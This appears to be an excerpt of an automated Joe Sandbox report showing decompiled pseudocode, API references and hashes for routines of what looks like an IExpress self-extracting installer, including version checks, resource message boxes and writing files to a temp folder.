                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3736221019
                                                                                                                                                                                                                                            • Opcode ID: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                                                            • Instruction ID: 633a4e4d03d8a2d48ab65d7f1b6a912a0697b6a0294d7cc0377eb5a6513f298e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC01A470B04108ABDF50EBA4DC49EEE77B8EF65311F50029AF589961D0DF709E8ACA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A92773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

APIs
• GlobalFree.KERNEL32 ref: 00A92A6F
  • Part of subcall function 00A92773: CharUpperA.USER32(306EBEDF,00000000,00000000,00000000), ref: 00A927A8
  • Part of subcall function 00A92773: CharNextA.USER32(0000054D), ref: 00A927B5
  • Part of subcall function 00A92773: CharNextA.USER32(00000000), ref: 00A927BC
  • Part of subcall function 00A92773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
  • Part of subcall function 00A92773: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
  • Part of subcall function 00A92773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                                                              • Part of subcall function 00A92773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005), ref: 00A92958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A92969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005,?), ref: 00A92A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A92A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                                                            • Instruction ID: 183369cd977eeb86233fc5e9757b62452ac8491e2d96eecb4cb0efee83dfb3be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4512932E00219EFCF25DF98C884AAEBBF5FF48740F14402AE905E7611DB319941DB94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A94169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A9468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A9468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A944B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A94189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A941E7
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 567571897348407577999125f371dc9a00625896e50456c1d1de2523632b381b
                                                                                                                                                                                                                                            • Instruction ID: 0edb4416e5e549c10dd7bbfeaa1db75c8a22cbd8b44b71cce5e6dddb1c092763
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 567571897348407577999125f371dc9a00625896e50456c1d1de2523632b381b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA01FFF53002243BFF2427A94C86F7B21DEDBE9795F204226B706E62809EA8CC0341B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A943D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa99a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A91A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A91A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A91A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A91A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A91A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                                                            • Instruction ID: 28ffb22c877db83ba57deb731e0f5f80cf3484d4beced83219d93ea509f980bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6511A53170110AAFDF10EFA4DE08AAE77F8EF59340F204256F51296590DE349E02CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A97155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa98004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa98004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa98008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
• GetCurrentProcessId.KERNEL32 ref: 00A97191
• GetCurrentThreadId.KERNEL32 ref: 00A9719A
• GetTickCount.KERNEL32 ref: 00A971A3
• QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
• Instruction ID: 345ffb8053f74a794aa4547418fbdcadd40a05daa9d3b83ef322a0290faf71ae
• Opcode Fuzzy Hash: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
• Instruction Fuzzy Hash: 52113A71E11208DBCF10DFF8DA48A9EB7F4EF18314F614A57D806E7220EA349A05CB51
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A91781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            				E00A9658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}
















APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A963EB
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
• API String ID: 1065093856-1610346413
• Opcode ID: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
• Instruction ID: cf29f51a44b085467e32f3d7baca73cb4cc7207f1ca92b07c52387d595e137b1
• Opcode Fuzzy Hash: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
• Instruction Fuzzy Hash: 6721C671B00118ABDB10DFA5DC85FEB73B8EB99314F10426AB54597140DAB05D858FA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A947E0(intOrPtr* __ecx) {
	intOrPtr _t6;
	intOrPtr _t9;
	void* _t11;
	void* _t19;
	intOrPtr* _t22;
	void _t24;
	struct HWND__* _t25;
	struct HWND__* _t26;
	void* _t27;
	intOrPtr* _t28;
	intOrPtr* _t33;
	void* _t34;

	_t33 = __ecx;
	_t34 = LocalAlloc(0x40, 8);
	if(_t34 != 0) {
		_t22 = _t33;
		_t27 = _t22 + 1;
		do {
			_t6 =  *_t22;
			_t22 = _t22 + 1;
		} while (_t6 != 0);
		_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
		 *_t34 = _t24;
		if(_t24 != 0) {
			_t28 = _t33;
			_t19 = _t28 + 1;
			do {
				_t9 =  *_t28;
				_t28 = _t28 + 1;
			} while (_t9 != 0);
			E00A91680(_t24, _t28 - _t19 + 1, _t33);
			_t11 =  *0xa991e0; // 0x7c8d90
			 *(_t34 + 4) = _t11;
			 *0xa991e0 = _t34;
			return 1;
		}
		_t25 =  *0xa98584; // 0x0
		E00A944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
		LocalFree(_t34);
		L2:
		return 0;
	}
	_t26 =  *0xa98584; // 0x0
	E00A944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
	goto L2;
}
















APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A94E6F), ref: 00A947EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00A94823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A94847
  • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
  • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
